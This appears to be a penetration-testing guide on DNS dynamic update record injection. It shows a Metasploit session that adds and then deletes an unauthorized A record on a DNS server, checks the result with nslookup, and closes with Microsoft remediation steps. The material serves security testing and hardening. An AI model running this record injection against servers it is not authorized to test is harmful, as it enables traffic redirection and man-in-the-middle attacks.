DNS Server Dynamic Update Record Injection
Table of Contents
Dynamic DNS Updating allows clients to create and delete DNS records in a particular zone. In DHCP environments, this is useful so clients with changing IP addresses can update those addresses with the local DNS server.
DNS Server Dynamic Update Record Injection
A security risk arises when the DNS server does not restrict who can update these DNS records. A malicious actor on the network may attempt to modify records in an attempt to perform MITM attacks.
During a Network Penetration Test, dynamic DNS updates are tested to see if access controls are in place.
Pentesting Dynamic Record Updates
During a network penetration test, the following can be used to update a record, note that we do need to provide the domain for the zone we are testing:
msf6 > use admin/dns/dyn_dns_update
msf6 auxiliary(admin/dns/dyn_dns_update) > set ACTION ADD
msf6 auxiliary(admin/dns/dyn_dns_update) > set RHOST 10.0.0.5
msf6 auxiliary(admin/dns/dyn_dns_update) > set DOMAIN example.com
DOMAIN => example.com
msf6 auxiliary(admin/dns/dyn_dns_update) > set HOSTNAME my-test-hostname
HOSTNAME => my-test-hostname
msf6 auxiliary(admin/dns/dyn_dns_update) > set IP 10.0.0.10
IP => 10.0.0.10
msf6 auxiliary(admin/dns/dyn_dns_update) > exploit
[+] Did not find an existing A record for my-test-hostname.example.com
[*] Sending dynamic DNS add message...
[+] The record 'my-test-hostname.example.com => 10.0.0.10' has been added!
[*] Auxiliary module execution completed
As a proof of concept we can now query the DNS server to confirm the record has been added:
~$ nslookup
> server 10.0.0.5
Default server: 10.0.0.5
Address: 10.0.0.5#53
> my-test-hostname.example.com
Server: 10.0.0.5
Address: 10.0.0.5#53
Name: my-test-hostname.example.com
Address: 10.0.0.10
If we need to clean up our record, we can run the following:
msf6 auxiliary(admin/dns/dyn_dns_update) > set ACTION DELETE
ACTION => DELETE
msf6 auxiliary(admin/dns/dyn_dns_update) > run
[+] Found existing A record for my-test-hostname.example.com
[*] Sending dynamic DNS delete message...
[+] The record 'my-test-hostname.example.com => 10.0.0.10' has been deleted!
[*] Auxiliary module execution completed
Penetration testers should also be aware that authorization can be granted by IP address, so if your testing origin is performed from a privileged network it may lead to false positives. This scenario is only likely where the DNS server is using software such as BIND, whereas Microsoft DNS authentication is performed by Active Directory.
Remediation of Dynamic Record Injection
Microsoft has provided the following recommendation for securing dynamic DNS updates. This includes:
- Configure the DNS updates to
Secure Only. - Enable the Name Protection feature on the DHCP server.
- Authorize the DHCP server via the
DNSUpdateProxyAD group to perform these updates.
The complete instruction steps can be found here: https://social.technet.microsoft.com/wiki/contents/articles/21984.how-to-secure-dns-updates-on-microsoft-dns-servers.aspx